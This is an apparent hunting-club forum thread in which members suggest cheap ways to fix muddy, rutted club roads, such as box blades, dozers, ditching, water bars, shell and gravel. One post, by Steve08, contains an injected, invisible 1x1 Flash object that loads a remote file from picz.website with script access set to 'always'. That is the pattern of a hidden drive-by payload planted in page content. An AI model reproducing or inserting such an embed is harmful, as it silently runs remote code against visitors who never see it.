Fixing Our Roads

bwarren2

Our club has a solid internal road system, but we had so much rain during the season, we still have some bad ruts and mud holes that have gotten bad. Outside of getting a bulldozer to fix the roads, any suggestions on a cheap fix?

Last edited:

T.P.

Banned
A bunch of tractors with box blades will do it, but a good man on a dozer can do it 20x faster.

swamp hunter

No use moving around mud , It won't last.
Wait till Dry out and a Front end loader Tractor with a Box Blade will do what you want..

elfiii

Admin
Staff member
A bunch of tractors with box blades will do it, but a good man on a dozer can do it 20x faster.

X 2. I'd pay the money for the dozer man to come in and knock it out.

Milkman

Deer Farmer Moderator
Staff member
How much damaged road are we talking about ?

tree cutter 08

It might not be to bad if the whole road is like that. Biggest thing is getting it to shed water. Spend the time to do some ditching in the worst spots and keep it up.

Milkman

Deer Farmer Moderator
Staff member
Length wise? We have over a mile of roads but the entire system is not in bad shape. We have some large mud holes that a 2WD truck couldn't get through.

Diversion berms and ditches are one way to keep water going where you want it instead of allowing it to wash out ruts or accumulate in low places.

you can do the work with rented equipment if you know how. Otherwise hiring someone is a good option.

snooker1

We used washed shell and it has stayed in place. the water filters through it without washing it away and when the water covers the road it does not float or wash away.

j_seph

Stop vehicle traffic on those monsoon days, that would help

nrh0011

Diversion berms and ditches are one way to keep water going where you want it instead of allowing it to wash out ruts or accumulate in low places.

you can do the work with rented equipment if you know how. Otherwise hiring someone is a good option.

absolutely, do some reading on broad base dips and water bars. These are some forestry conservation techniques that help preserve roads.

Steve08

A bunch of tractors with box blades will do it, but a good man on a dozer can do it 20x faster.<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
^
This. It's not that hard to do it at all.

j_seph

From what i have seen, you can scrape a road and scrape it but its still gonna rut if not packed. I have put gravel in ruts/holes/mudholes on a flat gravel road and they just seem to dissapear after a year or so

Stroker

From what i have seen, you can scrape a road and scrape it but its still gonna rut if not packed. I have put gravel in ruts/holes/mudholes on a flat gravel road and they just seem to dissapear after a year or so

Put in a good thick base of larger gravel or small rock and it will last a lot longer